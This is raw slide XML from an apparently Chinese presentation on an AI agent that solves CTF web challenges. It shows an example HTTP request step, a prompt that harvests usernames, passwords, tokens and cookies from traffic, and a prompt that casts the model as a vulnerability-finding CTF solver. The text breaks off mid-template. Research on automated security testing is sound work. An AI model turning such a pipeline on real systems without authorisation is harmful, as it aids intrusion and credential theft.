            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              </a:rPr>
              <a:t>&lt;step&gt; &lt;tool&gt;request&lt;/tool&gt; &lt;value&gt; &lt;url&gt;&lt;![CDATA[http://10.2.35.0:31002]]&gt;&lt;/url&gt; &lt;method&gt;GET&lt;/method&gt; &lt;header&gt; &lt;Content-Type&gt;&lt;![CDATA[text/html]]&gt;&lt;/Content-Type&gt; &lt;/header&gt; &lt;params&gt;&lt;/params&gt; &lt;raw&gt;&lt;/raw&gt; &lt;files&gt;&lt;/files&gt; &lt;needReturn&gt;True&lt;/needReturn&gt; &lt;/value&gt; &lt;/step&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="圆角矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577330" y="4676775"/>
            <a:ext cx="1439545" cy="132270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圆角矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8397875" y="4676775"/>
            <a:ext cx="1440000" cy="132270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1" name="图片 30"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5868035" y="5195570"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6661785" y="4700270"/>
            <a:ext cx="1295400"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Request</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33" name="文本框 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8477885" y="4693920"/>
            <a:ext cx="1295400"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Response</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34" name="文本框 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6680835" y="5083175"/>
            <a:ext cx="1027430" cy="707390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>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Url</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Header</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Param</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8522970" y="5099685"/>
            <a:ext cx="1027430" cy="707390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>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Header</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Content</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Redirect</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="图片 36"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7938430" y="4019550"/>
            <a:ext cx="540000" cy="54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关键步骤一</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页面探索</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 name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299720" y="1108075"/>
            <a:ext cx="5412740" cy="3421380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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361315" y="1153795"/>
            <a:ext cx="5345430" cy="3322955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你专注于从页面请求和响应中提取关键信息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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你需要仔细分析响应页面中的关键信息和请求包中的参数信息给出最终的分析结果，比如注册时提交的用户名密码等键值和页面的响应信息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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你需要返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>格式结果，格式如下：</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&lt;result&gt;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&lt;name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>页面简单命名（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>个字以内）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/name&gt;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&lt;description&gt;&lt;![CDATA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>页面描述，描述该页面的具体功能和可以显示的信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>]]&gt;&lt;/description&gt;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&lt;key&gt;&lt;![CDATA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>需要当前页面获取的关键线索（用户名、密码、令牌等），如果没有可以不填，使用自然语言描述，越详细越好，对于令牌需要描述该令牌传入方式，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>还是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>，并写清楚键值，尽可能详细的写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>]]&gt;&lt;/key&gt;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{flag_result}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&lt;/result&gt;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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="圆角矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590665" y="1153795"/>
            <a:ext cx="1439545" cy="132270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圆角矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204835" y="1153795"/>
            <a:ext cx="1440000" cy="132270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1" name="图片 30"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5881370" y="1672590"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6675120" y="1177290"/>
            <a:ext cx="1295400"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Request</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33" name="文本框 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8284845" y="1170940"/>
            <a:ext cx="1295400"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Response</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34" name="文本框 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6694170" y="1560195"/>
            <a:ext cx="1027430" cy="707390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>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Url</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Header</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Param</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8329930" y="1576705"/>
            <a:ext cx="1027430" cy="707390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>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Header</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Content</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Redirect</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="圆角矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574155" y="2806700"/>
            <a:ext cx="3066415" cy="132270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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5865495" y="3198495"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677660" y="2830195"/>
            <a:ext cx="1295400"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Page</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12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6693535" y="3246120"/>
            <a:ext cx="1373505" cy="707390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>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Name</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Description</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a:p>
            <a:r>
              <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rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8104505" y="3173730"/>
            <a:ext cx="1295400" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>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Request</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8104505" y="3629025"/>
            <a:ext cx="1295400" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>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Response</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pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="39718"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="288290" y="4842510"/>
            <a:ext cx="9923780" cy="1859915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9593"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="图片 36"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7665380" y="4223385"/>
            <a:ext cx="540000" cy="54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圆角矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6595745" y="5870575"/>
            <a:ext cx="2973705" cy="75628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圆角矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6595745" y="1108075"/>
            <a:ext cx="2973705" cy="1847850"/>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关键步骤二</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场景塑造</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 name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299720" y="1108075"/>
            <a:ext cx="5412740" cy="5518785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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361315" y="1153795"/>
            <a:ext cx="5345430" cy="4940300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>ctf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>题目解决者，你需要根据历史请求与响应包和获取的关键信息来生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>业务场景的漏洞检测的思路。</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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你需要一步步推理与得出最终的检测思路，推理步骤如下：</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>）历史请求中的哪些请求可能关联为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>业务场景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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>）该业务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>场景中的哪些功能点可能存在漏洞</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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>）对于这些漏洞生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>格式的最终检测思路：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&lt;solutions&gt;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&lt;solution&gt;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&lt;scene&gt;&lt;![CDATA[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
